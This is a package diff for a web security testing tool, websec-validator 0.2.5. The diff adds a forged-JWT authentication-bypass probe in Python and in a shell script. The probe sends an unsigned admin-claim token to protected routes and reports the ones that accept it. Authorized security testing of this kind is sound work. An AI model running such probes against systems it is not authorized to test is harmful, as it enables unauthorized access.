websec-validator 0.2.4__tar.gz → 0.2.5__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (60) hide show
  1. {websec_validator-0.2.4/src/websec_validator.egg-info → websec_validator-0.2.5}/PKG-INFO +1 -1
  2. {websec_validator-0.2.4 → websec_validator-0.2.5}/pyproject.toml +1 -1
  3. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/cli.py +14 -1
  4. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/dynamic.py +85 -2
  5. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/routes.py +16 -2
  6. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/findings.py +14 -0
  7. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/probes.py +8 -1
  8. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/scanners.py +62 -7
  9. websec_validator-0.2.5/src/websec_validator/templates/probes/forged-token.sh +84 -0
  10. websec_validator-0.2.5/src/websec_validator/templates/probes/rate-limit-burst.sh +89 -0
  11. {websec_validator-0.2.4 → websec_validator-0.2.5/src/websec_validator.egg-info}/PKG-INFO +1 -1
  12. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/SOURCES.txt +2 -0
  13. websec_validator-0.2.5/tests/test_hardening.py +137 -0
  14. websec_validator-0.2.4/src/websec_validator/templates/probes/rate-limit-burst.sh +0 -136
  15. {websec_validator-0.2.4 → websec_validator-0.2.5}/LICENSE +0 -0
  16. {websec_validator-0.2.4 → websec_validator-0.2.5}/README.md +0 -0
  17. {websec_validator-0.2.4 → websec_validator-0.2.5}/setup.cfg +0 -0
  18. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/__init__.py +0 -0
  19. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/briefing.py +0 -0
  20. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/calibration.json +0 -0
  21. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/calibration.py +0 -0
  22. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/constitution.py +0 -0
  23. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/corpus.json +0 -0
  24. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/__init__.py +0 -0
  25. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/auth.py +0 -0
  26. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/authz.py +0 -0
  27. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/base.py +0 -0
  28. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/client_exposure.py +0 -0
  29. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/graphql.py +0 -0
  30. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/iac_ci.py +0 -0
  31. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/integrations.py +0 -0
  32. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/schemas.py +0 -0
  33. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/stack.py +0 -0
  34. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/surface.py +0 -0
  35. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/tenant.py +0 -0
  36. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/proof.py +0 -0
  37. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/recon.py +0 -0
  38. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/report.py +0 -0
  39. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/_lib.py +0 -0
  40. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/bola-cross-tenant.sh +0 -0
  41. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/bola-write-verbs.py +0 -0
  42. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/compare-roles.sh +0 -0
  43. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/dlp-bypass-offline.py +0 -0
  44. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/hs256-brute-force.py +0 -0
  45. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/jwt-attacks.sh +0 -0
  46. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/mass-assignment.py +0 -0
  47. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/race-conditions.py +0 -0
  48. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/s3-assess.sh +0 -0
  49. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/ssrf-probes.sh +0 -0
  50. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/unauth-baseline.sh +0 -0
  51. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/webhook-forgery.py +0 -0
  52. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/FINDINGS-SUMMARY.md.template +0 -0
  53. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/access-control-matrix.md.template +0 -0
  54. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/findings-triage.md.template +0 -0
  55. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/pentest-handover-brief.md.template +0 -0
  56. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/per-tool-FINDINGS.md.template +0 -0
  57. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/dependency_links.txt +0 -0
  58. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/entry_points.txt +0 -0
  59. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/top_level.txt +0 -0
  60. {websec_validator-0.2.4 → websec_validator-0.2.5}/tests/test_recon.py +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.4
3
+ Version: 0.2.5
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "websec-validator"
7
- version = "0.2.4"
7
+ version = "0.2.5"
8
8
  description = "Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app."
9
9
  readme = "README.md"
10
10
  requires-python = ">=3.11"
@@ -103,9 +103,16 @@ def cmd_run(args) -> int:
103
103
  for r in scan_results:
104
104
  tag = r.get("findings", r.get("status", "?"))
105
105
  print(f" {r['name']}: {tag}")
106
- unified = scanners.normalize_findings(scan_results, out)
106
+ unified = scanners.normalize_findings(scan_results, out, target=target)
107
107
  print(f" → {unified['total']} de-duplicated findings "
108
108
  f"({unified['cross_tool_or_dup_merged']} merged) · {unified['by_severity']}")
109
+ _hyg = []
110
+ if unified.get('contamination_dropped'):
111
+ _hyg.append(f"{unified['contamination_dropped']} dropped (skip-dir contamination)")
112
+ if unified.get('local_only_downgraded'):
113
+ _hyg.append(f"{unified['local_only_downgraded']} downgraded (gitignored/local-only secret)")
114
+ if _hyg:
115
+ print(f" hygiene: {' · '.join(_hyg)}")
109
116
  else:
110
117
  print(f"\n scanners available: {', '.join(s['name'] for s in det['available']) or 'none'}"
111
118
  " (add --scan to execute them)")
@@ -162,6 +169,12 @@ def cmd_dynamic(args) -> int:
162
169
  for r in u["results"]:
163
170
  mark = "🔓" if r["verdict"] == "OPEN-no-auth" else (" ·" if r["verdict"] == "protected" else " ")
164
171
  print(f" {mark} {str(r['status']):>4} {r['verdict']:26} {r['path']}")
172
+ ftb = dyn.get("forged_token_bypass", {})
173
+ if ftb:
174
+ print(f"\n forged-token (unverified-signature) → {ftb['summary']}")
175
+ for r in ftb.get("results", []):
176
+ if r["verdict"] == "BYPASS":
177
+ print(f" 🚨 BYPASS {r['baseline']}→{r['forged']} {r['method']} {r['path']} (via {r['via']})")
165
178
  if args.probe_writes:
166
179
  w = dyn["write_auth_enforcement"]
167
180
  print(f"\n write-verb auth enforcement → {w['summary']}")
@@ -37,10 +37,13 @@ def _dig(d: dict, dotted: str):
37
37
  return cur
38
38
 
39
39
 
40
- def _request(method: str, url: str, token: str | None, timeout: int = 20, data: bytes | None = None):
40
+ def _request(method: str, url: str, token: str | None, timeout: int = 20,
41
+ data: bytes | None = None, cookie: str | None = None):
41
42
  headers = {"Accept": "application/json"}
42
43
  if token:
43
44
  headers["Authorization"] = f"Bearer {token}"
45
+ if cookie:
46
+ headers["Cookie"] = cookie
44
47
  if data is not None:
45
48
  headers["Content-Type"] = "application/json"
46
49
  req = urllib.request.Request(url, method=method, headers=headers, data=data)
@@ -254,9 +257,89 @@ def write_auth_enforcement(target: str, facts: dict, max_endpoints: int = 80) ->
254
257
  }
255
258
 
256
259
 
260
+ # Codes that mean "the request reached the handler/validation" — i.e. auth PASSED. Used to
261
+ # judge a forged-token attempt. Deliberately EXCLUDES 401/403 (blocked), 429 (rate-limited —
262
+ # would otherwise be a false bypass), 5xx and 000/None (ambiguous/transport). A gated route
263
+ # (401/403 with no token) that returns one of these WITH a forged token = signature not verified.
264
+ _REACHED_HANDLER = {200, 201, 202, 203, 204, 206, 400, 404, 405, 409, 413, 415, 422}
265
+
266
+
267
+ def _forge_jwt(payload: dict, alg: str = "RS256") -> str:
268
+ """A structurally-valid JWT with a DELIBERATELY INVALID signature (no real key). The whole
269
+ point is to see whether the target verifies the signature at all — a correct verifier
270
+ rejects this outright; a decode-only auth path (the decodeJwtPayloadUnsafe class) trusts it."""
271
+ import base64
272
+
273
+ def b(o):
274
+ return base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
275
+ sig = "" if alg == "none" else "d2Vic2VjLWZvcmdlZC1zaWc" # 'websec-forged-sig' — not a real signature
276
+ return ".".join([b({"alg": alg, "typ": "JWT", "kid": "forged"}), b(payload), sig])
277
+
278
+
279
+ def forged_token_bypass(target: str, facts: dict, cookie_names=None,
280
+ probe_writes: bool = False, max_endpoints: int = 60) -> dict:
281
+ """Does the app actually VERIFY JWT signatures? Forge a token with a far-future `exp` and a
282
+ BOGUS signature, present it to each route that is GATED without auth, and compare. A route
283
+ that answers 401/403 with NO token but REACHES THE HANDLER with the forged token is trusting
284
+ an unverified token = authentication bypass (CWE-347 / OWASP API2:2023) — the dynamic verdict
285
+ on the `decodeJwtPayloadUnsafe`/`jwt.decode(verify=False)` hypothesis.
286
+
287
+ GET reads by default (read-safe); write verbs (empty body, dummy ids — non-destructive) only
288
+ when `probe_writes`. Tries `Authorization: Bearer` (universal) plus any `cookie_names` given,
289
+ since apps read tokens from different locations. 429/5xx are treated as inconclusive, never
290
+ a bypass, so an aggressive rate limiter can't manufacture a false positive."""
291
+ forged = _forge_jwt({"sub": "websec-forged", "email": "websec-forged@example.com",
292
+ "role": "admin", "roles": ["admin"], "exp": 9999999999})
293
+ cookie_names = list(cookie_names or [])
294
+
295
+ targets = [("GET", e.get("path", "")) for e in (facts.get("routes") or {}).get("endpoints", [])
296
+ if e.get("method") == "GET" and "{" not in e.get("path", "")
297
+ and not SIDE_EFFECTING.search(e.get("path", ""))]
298
+ if probe_writes:
299
+ targets += [(e.get("method"), e.get("path", "")) for e in (facts.get("routes") or {}).get("endpoints", [])
300
+ if e.get("method") in WRITE_VERBS and "{" not in e.get("path", "")
301
+ and not SIDE_EFFECTING.search(e.get("path", ""))]
302
+ targets = sorted(set(targets))[:max_endpoints]
303
+
304
+ results, bypassed = [], []
305
+ for method, path in targets:
306
+ url = target + path
307
+ body = b"{}" if method in WRITE_VERBS else None
308
+ base_code, _ = _request(method, url, token=None, data=body)
309
+ if base_code not in (401, 403):
310
+ continue # only routes that are gated WITHOUT auth tell us anything about forgery
311
+ attempts = [("Authorization: Bearer", _request(method, url, token=forged, data=body)[0])]
312
+ for cn in cookie_names:
313
+ attempts.append((f"cookie:{cn}", _request(method, url, token=None, data=body, cookie=f"{cn}={forged}")[0]))
314
+ hit = next(((via, code) for via, code in attempts if code in _REACHED_HANDLER), None)
315
+ if hit:
316
+ via, fcode = hit
317
+ row = {"method": method, "path": path, "baseline": base_code, "forged": fcode,
318
+ "via": via, "verdict": "BYPASS"}
319
+ bypassed.append(row)
320
+ else:
321
+ row = {"method": method, "path": path, "baseline": base_code,
322
+ "forged": attempts[0][1], "via": "Authorization: Bearer", "verdict": "rejected"}
323
+ results.append(row)
324
+
325
+ return {
326
+ "target": target,
327
+ "mode": "present an UNSIGNED/bogus-sig JWT (far-future exp) to each gated route; "
328
+ "reached-handler = signature not verified",
329
+ "token_locations": ["Authorization: Bearer"] + [f"cookie:{c}" for c in cookie_names],
330
+ "tested": len(results),
331
+ "bypassed": bypassed,
332
+ "results": results,
333
+ "summary": f"{len(bypassed)}/{len(results)} gated route(s) accepted a forged unsigned token"
334
+ + (" — ⚠ SIGNATURE NOT VERIFIED (CWE-347 auth bypass)" if bypassed
335
+ else " — all rejected the forged token"),
336
+ }
337
+
338
+
257
339
  def run_unauth(target: str, facts_path: Path, outdir: Path, probe_writes: bool = False) -> dict:
258
340
  facts = json.loads(Path(facts_path).read_text())
259
- res = {"unauth_reachability": unauth_reachability(target, facts)}
341
+ res = {"unauth_reachability": unauth_reachability(target, facts),
342
+ "forged_token_bypass": forged_token_bypass(target, facts, probe_writes=probe_writes)}
260
343
  if probe_writes:
261
344
  res["write_auth_enforcement"] = write_auth_enforcement(target, facts)
262
345
  outdir.mkdir(parents=True, exist_ok=True)
@@ -25,7 +25,18 @@ import subprocess
25
25
  import tempfile
26
26
  from pathlib import Path
27
27
 
28
- from .base import Extractor, RepoContext
28
+ from .base import SKIP_DIRS, Extractor, RepoContext
29
+
30
+ # Noir is a subprocess that scans the raw tree — it does NOT know the walker's SKIP_DIRS,
31
+ # so without this it grinds through (and emits routes from) build output (.next, cdk.out,
32
+ # dist), dependencies (node_modules, vendor), and NESTED WORKTREES (.claude/worktrees — a
33
+ # full copy of the repo → doubled routes). Pass the skip dirs as exclude globs (perf) AND
34
+ # post-filter Noir's output by code_path (the correctness guarantee).
35
+ _NOIR_SKIP_GLOBS = ",".join(f"**/{d}/**" for d in sorted(SKIP_DIRS))
36
+
37
+
38
+ def _in_skip_dir(code_path: str) -> bool:
39
+ return any(part in SKIP_DIRS for part in (code_path or "").replace("\\", "/").split("/"))
29
40
 
30
41
  WRITE_VERBS = {"POST", "PUT", "PATCH", "DELETE"}
31
42
  EXCLUDE_GLOBS = "*.test.ts,*.test.tsx,*.spec.ts,*.test.js,*.spec.js,*_test.go,*_test.py,test_*.py,*.stories.tsx"
@@ -71,7 +82,7 @@ def _noir_scan(root: Path, extra_excludes: list | None = None) -> list | None:
71
82
  """Run Noir → list of endpoint dicts, or None if Noir unavailable/failed."""
72
83
  if not shutil.which("noir"):
73
84
  return None
74
- excl = EXCLUDE_GLOBS + ("," + ",".join(extra_excludes) if extra_excludes else "")
85
+ excl = ",".join([EXCLUDE_GLOBS, _NOIR_SKIP_GLOBS] + (list(extra_excludes) if extra_excludes else []))
75
86
  with tempfile.NamedTemporaryFile(suffix=".json", delete=False) as tf:
76
87
  out = Path(tf.name)
77
88
  try:
@@ -222,6 +233,9 @@ class RoutesExtractor(Extractor):
222
233
  # unreliable for bare dir names; this guarantees `--exclude <path>` drops those routes).
223
234
  if getattr(ctx, "excludes", None):
224
235
  routes = [r for r in routes if not ctx._excluded(r.get("code_path", ""))]
236
+ # Noir doesn't honor SKIP_DIRS — drop any route it found under build output / deps /
237
+ # nested worktrees (e.g. .claude/worktrees/* doubling the whole app).
238
+ routes = [r for r in routes if not _in_skip_dir(r.get("code_path", ""))]
225
239
  by_method: dict = {}
226
240
  by_tech: dict = {}
227
241
  for r in routes:
@@ -164,6 +164,20 @@ def build_ledger(facts: dict, unified: dict | None, dynamic: dict | None = None,
164
164
  f"{ud.get('decoder')}() — if that decodes a token/signature WITHOUT verifying it, a forged "
165
165
  "value is trusted (the decodeJwtPayloadUnsafe → requireAdmin class of bug). Trace the call path."}]))
166
166
 
167
+ # ---- 1d. Forged-token acceptance — unverified signature, DYNAMICALLY CONFIRMED ----
168
+ # The verdict for 1c: we presented an UNSIGNED/bogus-sig token and the route reached its
169
+ # handler anyway (no-auth 401/403 → reached-handler with the forged token). That is the
170
+ # decodeJwtPayloadUnsafe/jwt.decode(verify=False) hypothesis proven — CWE-347 broken auth.
171
+ for b in ((dynamic or {}).get("forged_token_bypass", {}) or {}).get("bypassed", []):
172
+ out.append(_f(
173
+ f"Auth bypass: forged unsigned token accepted — {b.get('method')} {b.get('path')}",
174
+ "access-control", "unsafe-auth-decoder", "CRITICAL", "HIGH",
175
+ f"{b.get('method')} {b.get('path')}",
176
+ [{"layer": "dynamic", "detail": f"no auth → HTTP {b.get('baseline')}; a token with NO valid "
177
+ f"signature (via {b.get('via')}, far-future exp) → HTTP {b.get('forged')} — the auth gate "
178
+ "accepted it, so the signature is NOT verified. Reachable by anyone who can craft a token "
179
+ "string; route the guard through a verifying decode (jwt.verify w/ the key / a checked session)."}]))
180
+
167
181
  # ---- 2. Static scanner findings (de-duplicated `unified`) ----
168
182
  cat_to_class = {"sca": "cve", "secret": "secret", "iac": "iac", "sast": "sast"}
169
183
  for t in (unified or {}).get("top", []):
@@ -28,6 +28,8 @@ PROBES = {
28
28
  "a low-priv token + a write endpoint that updates a record"),
29
29
  "jwt-attacks": ("jwt-attacks.sh", "JWT: alg:none, tamper, expiry, replay",
30
30
  "a valid token + the login + a protected endpoint"),
31
+ "forged-token": ("forged-token.sh", "Forged/unsigned-JWT acceptance (CWE-347 broken auth)",
32
+ "just the target base URL — it forges its own token + reads routes from probe-context.json"),
31
33
  "hs256-brute-force": ("hs256-brute-force.py", "Offline HS256 weak-secret brute",
32
34
  "one HS256 JWT (offline — no live app needed)"),
33
35
  "ssrf-probes": ("ssrf-probes.sh", "SSRF: IMDS / RFC1918 / file://",
@@ -47,7 +49,7 @@ PROBES = {
47
49
 
48
50
  # unauth-baseline is ALWAYS staged: it's the cheapest probe and directly exercises the
49
51
  # #1 lead class (missing authentication) — the one a no-creds run can confirm immediately.
50
- ALWAYS = ["unauth-baseline", "jwt-attacks", "hs256-brute-force", "rate-limit-burst"]
52
+ ALWAYS = ["unauth-baseline", "forged-token", "jwt-attacks", "hs256-brute-force", "rate-limit-burst"]
51
53
 
52
54
  # which targeting bucket each probe should be pointed at (for the manifest's real targets)
53
55
  _TARGET_KEYS = {
@@ -100,6 +102,10 @@ def build_context(facts: dict) -> dict:
100
102
  auth = facts.get("auth") or {}
101
103
  writes = [f"{e.get('method')} {e.get('path')}" for e in routes.get("endpoints", [])
102
104
  if e.get("method") in WRITE_VERBS][:80]
105
+ # GET/HEAD data-read routes — the read half of the protected surface (the forged-token probe
106
+ # needs these; the bypass class hits reads like /api/wallets/lookup that are in no other bucket).
107
+ reads = [f"{e.get('method')} {e.get('path')}" for e in routes.get("endpoints", [])
108
+ if e.get("method") in ("GET", "HEAD")][:80]
103
109
  return {
104
110
  "target_base_url": "FILL_ME (e.g. http://localhost:3000)",
105
111
  "auth": {
@@ -111,6 +117,7 @@ def build_context(facts: dict) -> dict:
111
117
  },
112
118
  "endpoints": {
113
119
  "writes": writes,
120
+ "reads": reads,
114
121
  "idor_candidates": tgt.get("idor_candidates", [])[:60],
115
122
  "ssrf_candidates": tgt.get("ssrf_candidates", [])[:40],
116
123
  "upload_candidates": tgt.get("upload_candidates", [])[:40],
@@ -20,6 +20,8 @@ import subprocess
20
20
  from dataclasses import dataclass
21
21
  from pathlib import Path
22
22
 
23
+ from .extractors.base import SKIP_DIRS
24
+
23
25
 
24
26
  @dataclass(frozen=True)
25
27
  class Scanner:
@@ -33,11 +35,19 @@ class Scanner:
33
35
  argv: object = None
34
36
 
35
37
 
36
- # Never scan the tool's own output, deps, or build artifacts. Scanning `websec-out/`
37
- # made Semgrep re-flag the AWS keys Gitleaks had just written into the report (and the
38
- # count compounded across runs). Filesystem scanners get these excluded explicitly.
39
- EXCLUDE_DIRS = ("websec-out", "node_modules", ".next", "dist", "build", ".git",
40
- "security", ".venv", "venv", "__pycache__", ".mypy_cache", "coverage")
38
+ # ONE source of truth for "don't scan here": the walker's SKIP_DIRS (extractors/base.py).
39
+ # A subprocess scanner has its OWN traversal and will otherwise re-enter dirs the walker
40
+ # skips e.g. trivy walked `.claude/worktrees/<full-repo-copy>/websec-out/.../gitleaks.json`
41
+ # and reported the tool's OWN prior output back as an AWS-key CRITICAL (bug-066). The
42
+ # --skip-dirs / --exclude flags below are best-effort perf; `_in_skip_dir` post-filtering in
43
+ # normalize_findings is the correctness guarantee (it also covers gitleaks, which has no skip
44
+ # flag). Was previously a hand-maintained subset that omitted .claude / .worktrees / .wolf.
45
+ EXCLUDE_DIRS = tuple(sorted(SKIP_DIRS))
46
+
47
+
48
+ def _in_skip_dir(path: str) -> bool:
49
+ """True if any path segment is a SKIP_DIR — mirrors the walker's per-segment rule."""
50
+ return any(part in SKIP_DIRS for part in (path or "").replace("\\", "/").split("/"))
41
51
 
42
52
 
43
53
  def _trivy(target: Path, out: Path, excludes=()) -> list:
@@ -243,9 +253,30 @@ def _norm_semgrep(data: dict) -> list:
243
253
  _PARSERS = {"trivy": _norm_trivy, "gitleaks": _norm_gitleaks, "semgrep": _norm_semgrep}
244
254
 
245
255
 
246
- def normalize_findings(scan_results: list, outdir: Path) -> dict:
256
+ def _gitignored(target: Path | None, paths) -> set:
257
+ """Subset of `paths` (relative to `target`) that git IGNORES — local-only files that were
258
+ never committed. A WORKING-TREE secret in such a file (e.g. a gitignored `.env.local`) is
259
+ not a repo leak, so we downgrade it instead of crying CRITICAL (bug-066). Empty set if not
260
+ a git repo / git absent (fail-open). Git-HISTORY findings (gitleaks) are left untouched —
261
+ those ARE committed."""
262
+ paths = sorted({p for p in paths if p})
263
+ if not target or not paths or not shutil.which("git"):
264
+ return set()
265
+ try:
266
+ proc = subprocess.run(["git", "-C", str(target), "check-ignore", "--stdin"],
267
+ input="\n".join(paths), capture_output=True, text=True, timeout=30)
268
+ return {ln.strip() for ln in proc.stdout.splitlines() if ln.strip()}
269
+ except Exception:
270
+ return set()
271
+
272
+
273
+ def normalize_findings(scan_results: list, outdir: Path, target: Path | None = None) -> dict:
247
274
  """Merge every scanner's native JSON into one de-duplicated, severity-ranked
248
- findings.json. Returns a summary (raw vs deduped, by severity/category)."""
275
+ findings.json. Returns a summary (raw vs deduped, by severity/category).
276
+
277
+ `target` (the scanned repo) enables two bug-066 hygiene passes: drop findings under a
278
+ SKIP_DIR (a scanner re-entered a dir the walker skips), and downgrade working-tree secrets
279
+ that live in gitignored (never-committed) files."""
249
280
  raw = []
250
281
  for r in scan_results:
251
282
  out, key = r.get("output"), r.get("key")
@@ -257,6 +288,28 @@ def normalize_findings(scan_results: list, outdir: Path) -> dict:
257
288
  except Exception:
258
289
  continue
259
290
 
291
+ # bug-066 (a): a subprocess scanner can re-enter dirs the walker skips (nested worktrees,
292
+ # build output, the tool's own websec-out) → drop anything under a SKIP_DIR. The
293
+ # correctness guarantee behind the best-effort flags; also catches gitleaks (no skip flag).
294
+ before = len(raw)
295
+ raw = [f for f in raw if not _in_skip_dir(f.get("file", ""))]
296
+ contamination_dropped = before - len(raw)
297
+
298
+ # bug-066 (b): working-tree secrets (trivy fs) in GITIGNORED files are local-only / never
299
+ # committed — not a repo leak. Downgrade + annotate rather than report CRITICAL. Gitleaks
300
+ # findings come from git HISTORY (already committed) and are deliberately left alone.
301
+ ignored = _gitignored(target, (f.get("file", "") for f in raw
302
+ if f.get("tool") == "trivy" and f.get("category") == "secret"))
303
+ local_only_downgraded = 0
304
+ for f in raw:
305
+ if (f.get("tool") == "trivy" and f.get("category") == "secret"
306
+ and f.get("file", "") in ignored
307
+ and SEV_ORDER.get(f.get("severity"), 0) >= SEV_ORDER["MEDIUM"]):
308
+ f["severity"] = "LOW"
309
+ if "local-only" not in f["title"]:
310
+ f["title"] += " — local-only (gitignored, never committed; rotate if real, not a repo leak)"
311
+ local_only_downgraded += 1
312
+
260
313
  by_fp: dict = {}
261
314
  for f in raw:
262
315
  fp = f["fingerprint"]
@@ -278,6 +331,8 @@ def normalize_findings(scan_results: list, outdir: Path) -> dict:
278
331
  by_cat[f["category"]] = by_cat.get(f["category"], 0) + 1
279
332
  return {"total_raw": len(raw), "total": len(deduped),
280
333
  "cross_tool_or_dup_merged": len(raw) - len(deduped),
334
+ "contamination_dropped": contamination_dropped,
335
+ "local_only_downgraded": local_only_downgraded,
281
336
  "by_severity": by_sev, "by_category": by_cat,
282
337
  "top": [{"severity": f["severity"], "category": f["category"], "title": f["title"],
283
338
  "file": f["file"], "tools": f["tools"]} for f in deduped[:15]]}
@@ -0,0 +1,84 @@
1
+ #!/usr/bin/env bash
2
+ # forged-token — does this app actually VERIFY JWT signatures? Forge a token with a BOGUS
3
+ # signature + far-future exp and present it to each route that is GATED without auth. A route
4
+ # that returns 401/403 with NO token but REACHES THE HANDLER (200/400/404/422/…) WITH the
5
+ # forged token is trusting an UNVERIFIED token = authentication bypass (CWE-347 / OWASP API2).
6
+ # This is the dynamic VERDICT on a `decodeJwtPayloadUnsafe` / `jwt.decode(verify=False)` finding:
7
+ # the recon says "an unverified decoder feeds an auth decision"; this proves which routes fall.
8
+ #
9
+ # Read-only by default (GET routes). Set PROBE_WRITES=1 to ALSO test write verbs (empty body —
10
+ # non-destructive) — LOCALHOST/TEST only. Reads this app's routes from ./probe-context.json
11
+ # (written by websec). Tries Authorization: Bearer, plus a cookie if you pass COOKIE_NAME.
12
+ # Usage: TARGET=https://127.0.0.1:8443 [PROBE_WRITES=1] [COOKIE_NAME=session] bash forged-token.sh
13
+ set -uo pipefail
14
+ ctx="$(dirname "$0")/probe-context.json"
15
+ BASE="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
16
+ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
17
+ echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
18
+ fi
19
+ BASE="${BASE%/}"
20
+
21
+ # A structurally-valid JWT with a DELIBERATELY INVALID signature + far-future exp. A correct
22
+ # verifier rejects this outright; a decode-only auth path trusts its claims.
23
+ FORGED=$(python3 -c "
24
+ import base64, json
25
+ def b(o): return base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b'=').decode()
26
+ print(b({'alg':'RS256','typ':'JWT','kid':'forged'})+'.'+b({'sub':'websec-forged','email':'websec-forged@example.com','role':'admin','roles':['admin'],'exp':9999999999})+'.d2Vic2VjLWZvcmdlZC1zaWc')
27
+ ")
28
+
29
+ # Routes to test: GET reads + GET idor/ssrf candidates (always); writes when PROBE_WRITES=1.
30
+ # Skip any path with an unfilled {param}. (portable; macOS bash 3.2 lacks `mapfile`.)
31
+ ROUTES=()
32
+ while IFS= read -r line; do [ -n "$line" ] && ROUTES+=("$line"); done < <(PROBE_WRITES="${PROBE_WRITES:-0}" python3 -c "
33
+ import json, os
34
+ c = json.load(open('$ctx')); eps = c['endpoints']
35
+ rows = list(eps.get('reads', []))
36
+ rows += [r.split(' ')[0] for r in eps.get('ssrf_candidates', [])] # 'GET /x (param: y)' -> 'GET /x'
37
+ rows += [r for r in eps.get('idor_candidates', []) if r.split(' ',1)[0] == 'GET']
38
+ if os.environ.get('PROBE_WRITES') == '1': rows += eps.get('writes', [])
39
+ seen=set(); out=[]
40
+ for r in rows:
41
+ m = r.strip().split(' ', 1)
42
+ if len(m) != 2: continue
43
+ meth, path = m[0], m[1].split(' ')[0].strip()
44
+ if '{' in path or (meth, path) in seen: continue
45
+ seen.add((meth, path)); out.append(meth + ' ' + path)
46
+ print('\n'.join(out[:80]))
47
+ " 2>/dev/null)
48
+ if [ "${#ROUTES[@]}" -eq 0 ]; then
49
+ echo "No concrete (no-{param}) routes in probe-context.json to test."; exit 2
50
+ fi
51
+
52
+ # Codes that mean the request REACHED THE HANDLER (auth passed). Excludes 401/403 (blocked),
53
+ # 429 (rate-limited), 5xx/000 (ambiguous) so an aggressive limiter can't manufacture a bypass.
54
+ reached() { case "$1" in 200|201|202|203|204|206|400|404|405|409|413|415|422) return 0;; *) return 1;; esac; }
55
+
56
+ echo "forged-token vs $BASE · unsigned/bogus-sig JWT, far-future exp"
57
+ echo " (a gated route that REACHES its handler with this token is NOT verifying the signature)"
58
+ echo "----------------------------------------------------------------------------------------------------"
59
+ bypass=0; ok=0; skip=0
60
+ for ep in "${ROUTES[@]}"; do
61
+ method="${ep%% *}"; path="${ep#* }"
62
+ data=(); { [ "$method" != "GET" ] && [ "$method" != "HEAD" ]; } && data=(-H 'content-type: application/json' --data '{}')
63
+ na=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" ${data[@]+"${data[@]}"} --max-time 15)
64
